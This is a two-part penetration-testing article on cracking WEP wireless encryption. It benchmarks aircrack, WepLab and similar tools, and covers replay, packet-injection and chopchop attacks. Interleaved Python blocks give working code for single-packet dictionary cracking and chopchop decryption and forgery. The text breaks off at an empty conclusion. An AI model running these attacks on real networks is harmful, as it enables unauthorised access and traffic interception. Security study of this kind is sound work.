
Cracking WEP & WPA

Contents:
WEP: Dead Again
The Feds Can Own Your WLAN Too
Cracking WEP: Step by Step
Cracking WEP and WPA Wireless Networks

WEP: Dead Again


Part 1
Introduction
This article is the first of a two-part series that looks at the new generation of WEP cracking tools for WiFi networks, which offer dramatically faster speeds for penetration testers over the previous generation of tools. In many cases, a WEP key can be determined in seconds or minutes. Part one, below, compares the latest KoreK-based tools that perform passive statistical analysis and brute-force cracking on a sample of collected WEP traffic. Next time, in part two, we'll look at active attack vectors, including a method to dramatically increase the rate of packet collection to make statistical attacks even more potent.

Is WEP that bad?


Many security folks and even more wireless folks these days are saying that WEP isn't all that bad. They say that if you use modern equipment that filters weak Initialization Vectors (IVs) and change your keys frequently (or at least once in a while), nobody will ever crack your WEP. Sure, maybe some next-generation WEP attacks will arise one day that will change everything, but WEP is okay today for all but the most sensitive networks. Well, that next generation is already here, heralded by highly functional tools that make WEP look weaker than Barney Fife on guard duty, sleeping on the job. Let's take a look at some of the new tools that should be in every penetration tester's bag of tricks, rather than delving into the details of why the various attacks work. Time and time again, the industry has shown that it will not reject broken security safeguards until attacks are actually demonstrated in the real world. Here's how to quickly turn some heads.

The way things were


Since the summer of 2001, WEP cracking has been a trivial but time consuming process. A few tools, AirSnort perhaps the most famous, that implement the Fluhrer-Mantin-Shamir (FMS) attack were released to the security community -- who until then were aware of the problems with WEP but did not have practical penetration testing tools. Although simple to use, these tools require a very large number of packets to be gathered before being able to crack a WEP key. The AirSnort web site estimates the total number of packets at five to ten million, but the number actually required may be higher than you think. The first caveat to this old approach is that only encrypted packets count. As wireless access points transmit unencrypted beacons several times per second, it is easy to be fooled into believing that you have a larger number of useful packets than you really do. If you use Kismet for network discovery and sniffing, it breaks down the packet count for you, displaying the number of "Crypted" packets separately from the total number, as shown below:

Figure 1. Kismet in action.

The second thing working against your packet collection efforts is that only certain "interesting" or "weak" IVs are vulnerable to attack. Kismet also tells you how many of these have been gathered, although it may not use the same counting method as the various cracking tools. To make matters more difficult, wireless manufacturers responded to the FMS attack by filtering out the majority of weak IVs that their access points and wireless cards transmit. Unless your target network is using old equipment, chances are you'll have to collect no less than ten million encrypted packets to crack a WEP key using these older tools. In early 2002, h1kari released a tool called dwepcrack (part of the bsd-airtools package) that improved upon the existing implementations of the FMS attack. Although dwepcrack did a good job of advancing the practical implementation of statistical WEP cryptanalysis, its improvements were only incremental.

Tools that changed everything


On August 8th, 2004, a hacker named KoreK posted new WEP statistical cryptanalysis attack code (soon to become a tool called chopper) to the NetStumbler forums. While chopper is functional, it is not currently maintained, and the attacks have since seen better implementations in aircrack and WepLab. However, the KoreK attacks change everything. No longer are millions of packets required to crack a WEP key; no longer does the number of obviously "weak" or "interesting" IVs matter. With the new attacks, the critical ingredient is the total number of unique IVs captured, and a key can often be cracked with hundreds of thousands of packets, rather than millions.

Aircrack
The first tool in our new WEP cracking toolbox is aircrack by Christophe Devine. Implementing KoreK's attacks as well as improved FMS, aircrack provides the fastest and most effective statistical attacks available. To give aircrack a try, simply collect as many packets as possible from a WEP encrypted wireless network, save them as a pcap file, and then start aircrack from the command line.

Figure 2. aircrack succeeds.

How many packets does it take?


The number of packets required for success with aircrack varies greatly. As a rule of thumb, shoot for a minimum of 200,000 for a 64 bit key and 500,000 for a 128 bit key, and remember to count only encrypted packets with unique IVs, not total packets. aircrack comes with a handy packet capture tool called airodump that keeps a running tally of unique IVs (the counting method is imperfect but soon to be fixed) and is capable of handling very large capture files. Personally, I find it easier to use Kismet most of the time and simply estimate the number of unique IVs based on the number of "Crypted" packets reported by Kismet. The number of encrypted packets with unique IVs is typically more than 95% of the total number of encrypted packets.

How long does it take?


I often find that aircrack determines a WEP key within a few seconds, but the execution time is highly variable. Shorter execution times require more unique IVs, more luck, and the lowest successful "fudge factor," a setting that tells aircrack how wildly it should guess when trying new keys. The higher the fudge factor, the more keys aircrack will try, increasing both the potential time of execution and the likelihood that the attack will succeed. The fudge factor has a default value of two but may be set to any positive integer. The default setting may be a good place to start, but trying several different settings is frequently fruitful if the initial attack does not succeed. I have encountered some data sets that could be cracked with a fudge factor of one, several that could only be cracked with three, four, or higher, and one data set that could only be cracked with a fudge factor of 31 or higher.

The higher the fudge factor, the more branches aircrack will take. This generally results in a longer execution time unless a successful crack happens early in the process. The following graph shows the time of execution as reported by aircrack (not counting file loading and parsing) for a particular data set with various fudge factors. Blue dots represent the time required for a successful crack and red dots represent the time spent in a failed attempt.

Figure 3. aircrack execution times.

If the default fudge factor (two) fails, I usually double it for each subsequent attack on the same data set. By terminating any attack that takes longer than five or ten minutes, I have had good luck finding a successful fudge factor fairly quickly. One of the nice features of aircrack is that it works for both 64 bit and 128 bit WEP keys by default. If you know the key length of the target network, giving the length to aircrack as a command line option can speed up the process.
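The escalation just described, as an added example that is not code from the article or from aircrack itself: a small Python wrapper that runs aircrack with successive fudge factors, doubling on failure, and abandons any attempt that runs past a time limit. It assumes the aircrack 2.x command line used in this article (-f for the fudge factor, -n for the key length) and that the program announces success with the text "KEY FOUND"; both are assumptions about your build, so check them before relying on the wrapper.

```python
"""Added example, not part of the article: drive aircrack through the fudge
factor escalation the text describes (start at the default, double on
failure, abort any attempt that runs past a time limit). ASSUMPTIONS: the
aircrack 2.x options -f and -n as invoked in the article, and the "KEY FOUND"
marker it prints on success."""
import subprocess


def run_aircrack(pcap, fudge, keylen, timeout_secs):
    """One aircrack attempt; returns its combined output, or "" on timeout."""
    cmd = ["aircrack", "-f", str(fudge), "-n", str(keylen), pcap]
    try:
        done = subprocess.run(cmd, capture_output=True, text=True,
                              timeout=timeout_secs)
    except subprocess.TimeoutExpired:
        return ""          # the article's rule: give up on this fudge factor
    except FileNotFoundError:
        raise SystemExit("aircrack not found in PATH")
    return done.stdout + done.stderr


def find_fudge(pcap, keylen=128, start=2, max_fudge=64, timeout_secs=600,
               runner=run_aircrack):
    """Return (fudge, output) for the first attempt that reports a key, or
    None if nothing up to max_fudge succeeds. `runner` is injectable so the
    loop can be exercised without aircrack installed."""
    fudge = start
    while fudge <= max_fudge:
        out = runner(pcap, fudge, keylen, timeout_secs)
        if "KEY FOUND" in out:
            return fudge, out
        fudge *= 2
    return None


if __name__ == "__main__":
    import sys
    pcap_file = sys.argv[1] if len(sys.argv) > 1 else "packets.pcap"
    result = find_fudge(pcap_file)
    if result is None:
        print("no fudge factor up to the limit succeeded")
    else:
        print("fudge factor %d succeeded:\n%s" % result)
```

With the article's defaults (ten minute cap, fudge factors 2, 4, 8, 16, 32, 64) the worst case is an hour of wall-clock time before the wrapper gives up on a data set.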

WepLab
Although not quite as successful in my tests, Jose Ignacio Sanchez's WepLab provides an alternative implementation of the KoreK attacks that can be nearly as effective as aircrack, with a little experimentation. Similar to aircrack's fudge factor, WepLab provides a probability adjustment with its --perc command line option. The default --perc setting of 50% is fairly aggressive and results in relatively few branches, while higher settings increase the number of branches taken. In addition to excellent statistical attacks, WepLab provides brute force and dictionary cracking attacks that can be very effective. This combination of techniques makes WepLab an essential tool.

Comparing the tools


WepLab and aircrack are certainly impressive, but are they the best tools in the box? To find out, I performed a series of tests comparing the ability of several statistical WEP cracking tools. To set up the test, I configured a wireless access point with a random 128 bit WEP key, generated a great deal of traffic, and collected about 25 million encrypted packets. I then carved up the capture into shuffled subsets of various lengths and tried to crack each subset with each tool, measuring the number of seconds for every successful crack (including file load times). Trials that lasted more than ten hours were terminated. The results surprised me quite a bit.

Table 1. 128 bit WEP Cracking Times (in seconds)

Failed = the tool finished without the correct key; Long = trial terminated after ten hours; Error = dwepcrack aborted with an error message.

Data Packets | Weak IVs | Unique IVs | aircrack (default) | aircrack (-f 4) | AirSnort | WepLab (default) | WepLab (--perc 95) | WEPCrack | dwepcrack
23457438 | 8560 | 16775533 | Failed | 245 | 92 | Failed | 244 | Failed | Error
21016149 | 1807 | 16775167 | Failed | 249 | 41 | Failed | 247 | Failed | Failed
19584364 | 9340 | 16275925 | Failed | 230 | 114 | Failed | 229 | Failed | Failed
15690079 | 8694 | 12860342 | Failed | 184 | 90 | Failed | 179 | Failed | Error
15628308 | 5505 | 12361369 | Failed | 176 | 70 | Failed | 174 | Failed | Failed
11743639 | 8473 | 11743639 | Failed | 154 | 69 | Failed | 153 | Failed | Error
11739339 | 3037 | 11693841 | Failed | 150 | Failed | Failed | 151 | Failed | Failed
7829104 | 1001 | 5031233 | Failed | 74 | Failed | Failed | 77 | Failed | Error
7799213 | 5225 | 7779299 | Failed | 87 | 37 | Failed | 101 | Failed | Failed
4175159 | 1554 | 4069824 | 52 | 51 | Failed | Failed | 54 | Failed | Failed
3914568 | 767 | 3914568 | Failed | Failed | Failed | Failed | Failed | Failed | Error
3914553 | 3958 | 3914553 | 48 | 49 | Failed | Failed | 56 | Failed | Error
3884657 | 1490 | 3864743 | 48 | 46 | Failed | Failed | 52 | Failed | Failed
978652 | 986 | 978652 | Failed | Failed | Failed | Failed | 11 | Failed | Error
978633 | 371 | 978633 | Failed | 12 | Failed | Failed | 13 | Failed | Error
977219 | 264 | 974902 | Failed | 9 | Failed | Failed | 13 | Failed | Failed
684992 | 143 | 684992 | 8 | 8 | Failed | Failed | 11 | Failed | Error
683605 | 238 | 681288 | Failed | 18 | Failed | Failed | 13 | Failed | Failed
587184 | 117 | 587184 | Failed | 27 | Failed | Failed | Long | Failed | Error
489293 | 103 | 489293 | 8 | 7 | Failed | 5 | 5 | Failed | Error
489286 | 115 | 489286 | 15 | 16116 | Failed | Failed | Long | Failed | Error
391465 | 78 | 391465 | 5 | 13 | Failed | Failed | Long | Failed | Error
391433 | 78 | 391433 | Failed | 6 | Failed | Failed | 6 | Failed | Error
293596 | 65 | 293596 | Failed | 5 | Failed | Failed | Long | Failed | Error
293579 | 65 | 293579 | Failed | Failed | Failed | Failed | Failed | Failed | Error

Although aircrack was successful with the greatest number of data sets, it did not perform as well as I expected with the default fudge factor. In fact, beyond about four million packets, its success rate with default options noticeably declined with the addition of more packets. This problem was easily remedied, however, by increasing the fudge factor. A fudge factor of four was successful in nearly every case. In the few cases in which a fudge factor of four did not work, I was able to find a successful setting in the five to twenty range. WepLab's nearly complete failure with default options was surprising, but a little experimentation resulted in a --perc setting of 95% that rivaled even aircrack's best results. For some data sets, WepLab was more successful than aircrack; for others, aircrack was the winner. Overall, both tools yielded outstanding results with minor tweaking, though aircrack edged out WepLab in the smaller data sets. AirSnort's success rate matched my expectations quite closely, cracking nearly every key with ten million or more packets but failing most of the time when using a smaller data set. AirSnort's speed beat out aircrack and WepLab in every case. Of course, an extra minute or two is rarely a concern, so the superior cracking ability of the KoreK attacks with far less required input puts WepLab and aircrack well above AirSnort in my book. The most unexpected results were the total failures of WEPCrack and dwepcrack with all data sets. WEPCrack came up with as many as eleven out of thirteen correct bytes but always included incorrect bytes in its final result. Lacking a process to verify the correctness of a key, WEPCrack produced a false positive result every time. dwepcrack failed in every case, complaining of either "insufficient ivs," the inexplicable error, "unable to find a valid data packet in logfile," or, for my largest data set, "File too large." As the tests were performed under Linux, perhaps dwepcrack would be more successful in its native BSD environment.

Don't ignore the obvious


WepLab and aircrack make statistical attacks alarmingly easy, but many keys can be cracked without going to such lengths. The simple fact is that most people don't choose strong encryption keys, in part because vendors make it so easy to use weak ones. Because of this weakness, a great number of WEP encrypted networks are vulnerable to dictionary or brute force attacks that only require the capture of a single encrypted data packet to attempt. The simplest brute force attack involves trying every possible binary key, a process that is completely impractical for 128 bit keys but may be worth trying for 64 bit keys if you have a few supercomputers lying around. WepLab and dwepcrack provide the ability; you provide the CPU cycles. WepLab and WepAttack both provide two dictionary attack methods, one based on the more common MD5 hashing technique that many access points use to turn a passphrase into a binary WEP key, and the other using null terminated raw ASCII WEP keys, employed by a few devices. Knowledge of the target network hardware may help to determine which method would be preferred for a particular environment. Because both of the above tools can use any dictionary in a text file or standard input, powerful password cracking utilities such as John the Ripper may be used to generate the word list. Combined with John's ability to apply rules (various capitalizations, appending numbers, etc.) to a basic dictionary, these tools result in a successful crack surprisingly often. Although both performed dictionary attacks successfully in my tests, WepLab executed faster while WepAttack provided the convenience of multiple simultaneous attack modes. If a dictionary attack fails, an optimized brute force attack based on the vendor's passphrase method may be fruitful. For devices that use null terminated ASCII keys, WepLab offers a brute force attack that only tries ASCII bytes, resulting in a somewhat smaller (though still generally too large) key space. For 64 bit keys produced by the common seed-based passphrase generator (rather than the MD5 method), dwepcrack can execute an optimized brute force attack. This method, devised and first implemented by Tim Newsham, dramatically reduces the potential key space from 2^40 to 2^21 possible keys, resulting in an extremely fast attack.
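The two passphrase schemes and the single-packet dictionary attack described above, as an added example that is not code from the article or from WepLab or WepAttack. The 128 bit routine is the MD5 method the text mentions (repeat the passphrase to fill 64 bytes, MD5 it, keep 13 bytes); the 64 bit routine is the seed-and-LCG 40 bit generator that many consumer products used and that Newsham's 21-bit shortcut exploits (only the generator is shown, not the shortcut). The frame model is deliberately minimal: IV, RC4 body, CRC-32 ICV, with the 802.11 header and the key-index byte left out, and the "captured" frame, passphrase and word list are constructed for the example.

```python
"""Added example, not code from the article or from WepLab/WepAttack: how a
passphrase becomes a WEP key under the two schemes the text mentions, and a
dictionary attack that needs only one captured encrypted frame, because the
ICV inside it tells us whether a candidate key is right."""
import hashlib
import struct
import zlib


def key_128_from_passphrase(passphrase):
    # MD5 scheme used by many consumer access points: repeat the passphrase
    # to fill 64 bytes, MD5 it, keep the first 13 bytes (104 secret bits).
    raw = passphrase.encode()
    if not raw:
        raise ValueError("empty passphrase")
    buf = (raw * (64 // len(raw) + 1))[:64]
    return hashlib.md5(buf).digest()[:13]


def keys_40_from_passphrase(passphrase):
    # Seed-based 40-bit generator: XOR the passphrase bytes into a 32-bit
    # seed, then draw 4 keys x 5 bytes from a linear congruential generator.
    # Printable passphrases never set the high bit of any seed byte, which is
    # one reason the real seed space is far smaller than 2^32.
    seed = 0
    for i, b in enumerate(passphrase.encode()):
        seed ^= b << ((i & 3) * 8)
    keys = []
    for _ in range(4):
        key = bytearray()
        for _ in range(5):
            seed = (seed * 0x343FD + 0x269EC3) & 0xFFFFFFFF
            key.append((seed >> 16) & 0xFF)
        keys.append(bytes(key))
    return keys


def rc4(key, length):
    # Plain RC4: key scheduling, then `length` keystream bytes.
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(key, iv, plaintext):
    # Model of a WEP frame body: IV || RC4(IV||key)(plaintext || CRC-32 ICV).
    # The 802.11 header and the key-index byte are left out for brevity.
    body = plaintext + struct.pack("<I", zlib.crc32(plaintext))
    return iv + bytes(p ^ k for p, k in zip(body, rc4(iv + key, len(body))))


def wep_try_key(key, frame):
    # Decrypt with the candidate and return the data if the ICV checks out.
    # A wrong key passes by accident with probability 2^-32; a second
    # captured frame settles any doubt.
    iv, ct = frame[:3], frame[3:]
    body = bytes(c ^ k for c, k in zip(ct, rc4(iv + key, len(ct))))
    data, icv = body[:-4], body[-4:]
    return data if struct.pack("<I", zlib.crc32(data)) == icv else None


def dictionary_attack(frame, words):
    # Try each word under both schemes (and all four 40-bit key slots).
    for word in words:
        for key in [key_128_from_passphrase(word)] + keys_40_from_passphrase(word):
            if wep_try_key(key, frame) is not None:
                return word, key
    return None


# Constructed sample, not a real capture: one frame from a network whose
# 128-bit key came from the passphrase "tomato". The data is the LLC/SNAP +
# ARP-request prefix that such frames carry, a plausible first packet.
SAMPLE_IV = b"\x5c\x01\x17"
SAMPLE_DATA = bytes.fromhex("aaaa030000000806" "0001080006040001")
SAMPLE_FRAME = wep_encrypt(key_128_from_passphrase("tomato"), SAMPLE_IV, SAMPLE_DATA)
WORDLIST = ["password", "netgear", "Tomato", "tomato1", "tomato"]

if __name__ == "__main__":
    print(dictionary_attack(SAMPLE_FRAME, WORDLIST))
```

Feed the word list from John the Ripper's --stdout as the article does and the attack costs five RC4 key schedules per word; the ICV check is what makes a single captured packet sufficient.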

The complete toolbox


Featuring the most effective statistical attacks available, aircrack may be the single most important tool in the box. WepLab is also essential, providing several techniques including an excellent alternative implementation of the KoreK attacks. AirSnort may be worth trying if you have a lot of packets to work with, but its position as statistical attack leader has been usurped. WepAttack is a nice addition for dictionary attacks, and dwepcrack provides the most fruitful brute force technique. The only other essential ingredient is a method to collect packets; while most of these tools include packet gathering as a built-in ability or ancillary program, I personally prefer Kismet for this function. All of these tools are available in the Auditor Security Collection live Linux CD-ROM.

Concluding part one


Looking at the outstanding success rate of aircrack and WepLab in the 500,000 to 1,000,000 packet range, it is clear that a new era is upon us. Vendors' efforts to limit the transmission of weak IVs have been blown away, and the time required to collect packets for a successful statistical attack has been reduced twentyfold. If you thought WEP was okay, think again. All of the tools discussed so far are completely passive, receiving data but transmitting nothing. In part two, we will look at active WEP attacks, including a method to dramatically increase the rate of packet collection, making statistical attacks even more potent. Fasten your seat belts.

Notes:
Because a majority of the tools refer to 64 bit and 128 bit key lengths, this article adopts the convention. It is important to realize, however, that the secret portion of a 64 bit key is only 40 bits and the secret portion of a 128 bit key is only 104 bits. All tests were performed with a 1.6GHz Pentium-M laptop running Gentoo Linux (2.6.8.1 kernel). Linux was chosen for the tests in order to accommodate the greatest number of tools. Some of the tools are also available for OS X, Windows, and/or various BSDs. In addition, there are a few tools for the other platforms that are not available for Linux. None of these, however, appear to implement the KoreK attacks except for the current development version of KisMAC.

Tool information and links:

aircrack - version: 2.1 - sample invocation: aircrack -n 128 packets.pcap - sample invocation: aircrack -f 4 -n 128 packets.pcap - source: http://www.cr0.net:8040/code/network/aircrack/
AirSnort - version: 0.2.6 - sample invocation: airsnort - 128 bit crack breadth: 2 (default) - source: http://airsnort.shmoo.com/
Auditor Security Collection - version: 081004-01 - source: http://remote-exploit.org/?page=auditor
dwepcrack - version: 0.4 - sample invocation: dwepcrack -s -w packets.pcap - sample invocation: dwepcrack -b packets.pcap - source: http://www.e.kth.se/~pvz/wifi/ - notes: also tried binary from Auditor Security Collection with identical results
John the Ripper - version: 1.6 - source: http://www.openwall.com/john/
Kismet - version: Kismet-2004-10-R1 - source: http://www.kismetwireless.net/
WepAttack - version: 0.1.3 - sample invocation: john -w:words.txt -rules -stdout | wepattack -m n64 -f packets.pcap - source: http://wepattack.sourceforge.net/
WEPCrack - version: 0.1.0 - sample invocation: pcap-getIV.pl -b 13 -f packets.pcap; WEPCrack.pl - source: http://wepcrack.sourceforge.net/
WepLab - version: 0.1.3 - sample invocation: weplab -rpackets.pcap --key 128 testers.pcap - sample invocation: john -w:words.txt -rules -stdout | weplab -y --key 64 --attacks 1 testers.pcap - source: http://weplab.sourceforge.net/

Ideally, the input data sets would come from a variety of source networks with varied hardware and WEP keys. Although the results are not fully comprehensive, the spot checks against various networks generally agree with the test results.

Part 2
Introduction
In part one we examined the latest generation of passive WEP cracking tools that use statistical or brute force techniques to recover WEP encryption keys from captured wireless network traffic. This time, in the second and final article, we take a look at active tools that use 802.11 transmissions to attack WEP networks. All of these active wireless attack techniques discussed in this article require the ability to inject arbitrary packets onto a wireless network. Although a variety of injection methods are available, most require Linux, are unsupported, and use hacked drivers that have support and availability problems. All of them require at least one wireless PCMCIA card based on the Prism2 chipset (such as the Senao 2511-CD-PLUS). Fortunately, the Auditor Security Collection [ref 1] live cd-rom can save you a number of headaches as it includes ready-to-use drivers for several active attack tools. Beware of network disruptions that can be caused by active attacks. Using these tools may have unpredictable effects in various environments. In my testing, I have encountered a few systems that had to be rebooted in order to function again after being bombarded with injected packets.

Rapid traffic generation


If you've spent much time sniffing wireless networks (and, if you are reading this article, I bet you have) then you probably have noticed that the source and destination MAC addresses are plainly visible for every packet even when the packet contents are encrypted with WEP. This allows you to uniquely identify hosts on the wireless network as well as hosts on a bridged, wired LAN. If you've never tried traffic analysis of an encrypted wireless network, I highly recommend the exercise. Find a busy network, fire up Ethereal [ref 2], and try to answer as many of the following questions as you can:

- How many access points share the same ESSID?
- Does the access point bridge or route traffic?
- Is EAP used? If so, what EAP type?
- Is open system or shared key authentication in use?
- What is the MAC address of the default gateway?
- What are the NIC vendors for wireless hosts?
- What are the NIC vendors for wired hosts?
- What is the vendor of the access point?
- Can you find a DNS transaction?
- Can you find a TCP three-way handshake?
- Can you find an HTTP transaction?
- What hosts transmit/receive the most bytes/packets?
- Does any traffic occur with a distinct periodicity (like POP3 every 5 minutes)?
- Can you find any ARP traffic? (hint: frame.pkt_len==68 and wlan.da==ff:ff:ff:ff:ff:ff)

No wireless network based on WEP provides protection against replay attacks. With the right tools, you can take any captured packet and reinject it back onto the network. The packet will be correctly encrypted even though you have no idea of its contents. Then again, you may have a pretty good guess as to its contents based on traffic analysis. You might choose something that is likely to be an ARP request, hoping that it will generate a response from another host on the network. If you're right, you could replay the same packet hundreds or even thousands of times per second, forcing that host to spew an enormous stream of responses, individually encrypted with different IVs. This is exactly the method used by aireplay, a tool that comes with aircrack [ref 3]. A screenshot of aireplay is shown below in Figure 1. As we discovered in part one, both aircrack and WepLab [ref 4] are capable of cracking WEP keys after collecting just a few hundred thousand packets. With a successful aireplay attack, you can generate that many packets in just a few minutes. Therefore, people who say that re-keying every 10 minutes makes WEP unbreakable are dead wrong. Per-session, per-user keys also don't stand a chance against this attack. WEP is truly dead. . . again.

Figure 1. Aireplay at work.

The Auditor Security Collection live cd-rom makes it relatively easy to try aireplay because it includes aircrack's patched hostap driver by default, but you will need two wireless cards with at least several inches distance between their antennas. You may find it easier to use two laptops, one with a Prism2 card to replay captured packets, and a second to capture all the new traffic that is generated. Be prepared to spend some time finding an appropriate packet to replay; you may need to save individual packets with Ethereal and feed them to aireplay. Another tool that implements a similar attack has been around for much longer in the BSD world. Part of OpenBSD's Wnet, reinj performs the same attack as aireplay and does it all with just one Prism2 card (as does the latest beta of aireplay). Whichever tool you use to generate traffic, I recommend WepLab or aircrack for cracking the WEP key.

Encrypted packet injection


Most of the WEP attack tools on the scene today focus on cracking WEP keys, but there are also other WEP vulnerabilities that can be exploited. WEPWedgie [ref 5], a tool released in 2003 by Anton Rager, allows an attacker to craft an arbitrary plaintext packet and inject it into the wireless network without knowledge of the WEP key. The receiving stations accept the packet as if the sender used the correct key to encrypt the packet. The way WEPWedgie is able to accomplish this is by reconstructing the keystream that was used to encrypt a particular plaintext. With knowledge of some plaintext and the resulting ciphertext, a simple XOR operation yields the keystream that results from a particular IV. And because WEP allows the same IV to be used over and over again, WEPWedgie can use the keystream to correctly encrypt and inject any number of packets whose contents are limited only by the length of the known keystream. There are a number of ways that an attacker can discover the ciphertext for a known plaintext, but the method used by WEPWedgie's prgasnarf is to listen for shared key authentication. The 802.11 standard defines two types of authentication, "open system authentication" (which you can think of as "no authentication") and "shared key authentication" (which you can think of as "the most misguided authentication mechanism ever devised"). In shared key authentication, the AP transmits 128 bytes of plaintext, and then the station encrypts the plaintext and transmits the resulting ciphertext using the same key and cipher that are used by WEP to encrypt subsequent network traffic. Believe it or not, this horrifying scheme is still being recommended by certain vendors [ref 6] as a security enhancement, but it is less common in practice than open system authentication. Once a keystream has been captured (hint: spoofed deauthentication), WEPWedgie provides a number of interesting packet injection attacks. A simple one sends a ping to a target of your choice. The other attacks provide a method of port scanning targets on the wireless network using a chosen source address. As long as the target network has Internet connectivity, you can use the address of a host you control on a remote network and sniff the results of your scan on that host. Interpretation of the results is up to you.

Figure 2. Wepwedgie injecting pings.

To try out WEPWedgie, you'll need a system running a Linux 2.4 kernel, a Prism2 card, and Abaddon's AirJack [ref 7] driver. Unfortunately the Auditor CD's 2.6 kernel isn't supported by AirJack, so you'll have to prepare a system on your own. You might find the Wi-Fi Dog of War [ref 8] instructions helpful to get AirJack working.

Single packet decryption


KoreK, the individual who brought us the improved algorithms used in aircrack and WepLab, released a tool a few months ago on the NetStumbler forums that enables an attacker to decrypt individual packets without knowledge of the WEP key. Called chopchop [ref 9], this tool replays a single encrypted packet, modifying one byte at a time. By monitoring the access point to find out if it accepts the modified packet, chopchop is able to determine the plaintext value of that particular byte and move on to the next. Within several seconds (and thousands of replayed packets), chopchop can decrypt an entire packet. It doesn't matter what encryption key was used, or if a separate key is used for each user, or if the key changes every hour or minute; any packet can be decrypted.

Figure 3. Chopchop decrypting a single packet.

You can use the Auditor CD and a single Prism2 card to try chopchop. Use the switch-to-wlanng script that Auditor provides, pop the card out and then back in again, and the linux-wlan-ng driver will be working, complete with KoreK's injection modifications.
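The two attacks described in this part of the article, keystream recovery followed by injection under a reused IV (the WEPWedgie section) and one-byte-at-a-time decryption through the access point's accept/reject behaviour (chopchop), as one added example. This is not code from the article, from KoreK's chopchop or from WEPWedgie; it is my own worked version of the CRC-32 algebra those attacks rely on. One deliberate simplification, stated as an assumption: the RC4 keystream for the IV is stood in for by a constructed pad held by a model access point, because chopchop never touches the cipher, only the CRC-32 ICV and the fact that a given IV always yields the same keystream. The sample IV, pad and plaintext are constructed, not captured.

```python
"""Added example, not code from the article, from KoreK's chopchop or from
WEPWedgie: the CRC-32 algebra that lets an attacker decrypt a WEP frame one
byte at a time through an access point that accepts only ICV-valid frames,
and the keystream reuse that then lets it forge frames under the same IV.
ASSUMPTION: the RC4 keystream for the IV is a constructed pad; the attack
depends only on the CRC and on keystream reuse per IV, not on the cipher."""
import struct
import zlib

POLY = 0xEDB88320          # reflected CRC-32, as used for the WEP ICV
TABLE = []
for _i in range(256):
    _c = _i
    for _ in range(8):
        _c = (_c >> 1) ^ POLY if _c & 1 else _c >> 1
    TABLE.append(_c)
# The high byte of each table entry is unique, so a register value reveals
# which entry produced it: that is what lets us run the CRC backwards.
REV = {t >> 24: i for i, t in enumerate(TABLE)}


def crc_reg(data, reg=0xFFFFFFFF):
    """CRC-32 register after `data`, without the final complement."""
    for b in data:
        reg = TABLE[(reg ^ b) & 0xFF] ^ (reg >> 8)
    return reg


# Any message followed by its own ICV leaves the register at one constant
# (0x2144DF1C before the final complement); the empty message's ICV is four
# zero bytes, so computing it this way needs no magic number.
VALID_REG = crc_reg(bytes(4))


def bytes_reaching(target):
    """The four data bytes that drive the register from 0 to `target`."""
    idx = [0] * 4
    reg = target
    for k in (3, 2, 1, 0):            # undo the four steps, top byte first
        idx[k] = REV[reg >> 24]
        reg = ((reg ^ TABLE[idx[k]]) << 8) & 0xFFFFFFFF
    out = bytearray()
    reg = 0
    for k in range(4):                # replay forwards to read off the bytes
        out.append((reg ^ idx[k]) & 0xFF)
        reg = TABLE[idx[k]] ^ (reg >> 8)
    assert reg == target
    return bytes(out)


def chop_correction(guess):
    """Mask to XOR into the last four bytes of a body shortened by one byte.
    If the byte we cut off decrypted to `guess`, the register just before it
    is forced (processing that byte had to land on VALID_REG). Over four
    bytes the register is linear in (data XOR incoming register), so one
    fixed mask moves it from the forced value back to VALID_REG no matter
    what bytes precede it. Exactly one guess in 256 produces a valid ICV."""
    idx = REV[VALID_REG >> 24]
    before = ((VALID_REG ^ TABLE[idx]) << 8) | ((idx ^ guess) & 0xFF)
    return bytes_reaching(before ^ VALID_REG)


class ModelAP:
    """Stand-in for the access point: knows the keystream for each IV (a real
    AP derives it from the key) and accepts a body only if its ICV is valid."""

    def __init__(self, keystreams):
        self.keystreams = keystreams
        self.replays = 0

    def accepts(self, iv, body):
        self.replays += 1
        plain = bytes(c ^ k for c, k in zip(body, self.keystreams[iv]))
        return len(plain) >= 4 and crc_reg(plain) == VALID_REG


def wep_body(keystream, plaintext):
    """data || ICV, XORed with the keystream: what the attacker captures, and
    (with a recovered keystream) what the attacker forges."""
    body = plaintext + struct.pack("<I", zlib.crc32(plaintext))
    if len(body) > len(keystream):
        raise ValueError("keystream too short for this plaintext")
    return bytes(p ^ k for p, k in zip(body, keystream))


def chopchop(ap, iv, body):
    """Recover the whole keystream behind one captured body, last byte first,
    using nothing but the AP's accept/reject verdict on replayed frames."""
    frame = bytearray(body)
    keystream = bytearray()
    while len(frame) > 4:
        for guess in range(256):
            cand = frame[:-1]
            mask = chop_correction(guess)
            for i in range(4):
                cand[-4 + i] ^= mask[i]
            if ap.accepts(iv, bytes(cand)):
                keystream.insert(0, frame[-1] ^ guess)
                frame = cand
                break
        else:
            raise RuntimeError("no guess accepted; the oracle is not behaving")
    # Four bytes left: the empty message plus its all-zero ICV, which is the
    # first four keystream bytes in the clear.
    return bytes(frame) + bytes(keystream)


# Constructed sample values (assumptions, not a real capture).
IV = b"\x5c\x01\x17"
KEYSTREAM = bytes((i * 73 + 41) & 0xFF for i in range(48))
PLAINTEXT = bytes.fromhex("aaaa030000000806" "0001080006040001")

if __name__ == "__main__":
    ap = ModelAP({IV: KEYSTREAM})
    captured = wep_body(KEYSTREAM, PLAINTEXT)
    ks = chopchop(ap, IV, captured)
    print("keystream recovered:", ks == KEYSTREAM[:len(captured)],
          "after", ap.replays, "replays")
    forged = wep_body(ks, b"\xaa\xaa\x03ping")
    print("forged frame accepted under the same IV:", ap.accepts(IV, forged))
```

Each recovered byte costs at most 256 replays, which is where the "thousands of replayed packets" for one frame comes from, and nothing in the loop depends on the key, its length, or how often it is rotated. Against a real AP the verdict is read from whether the shortened frame is relayed or acknowledged rather than from a return value, and the full keystream then buys arbitrary injection under that IV, exactly as the text says the next generation of tools does.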

The next generation


Since the release of chopchop, the task of acquiring a valid keystream for encrypted packet injection has become trivial for all WEP encrypted networks. Joshua Wright is working on a new version of WEPWedgie that incorporates the chopchop attack and works with newer drivers. Christophe Devine's upcoming version of aireplay, already released as a beta, uses the same technique to allow the forgery of any ARP request. Various people are working to improve wireless drivers, including implementation of packet injection with a wider variety of hardware (prism54 is reported to work already), and construction of an abstraction layer for packet injection.

Conclusion
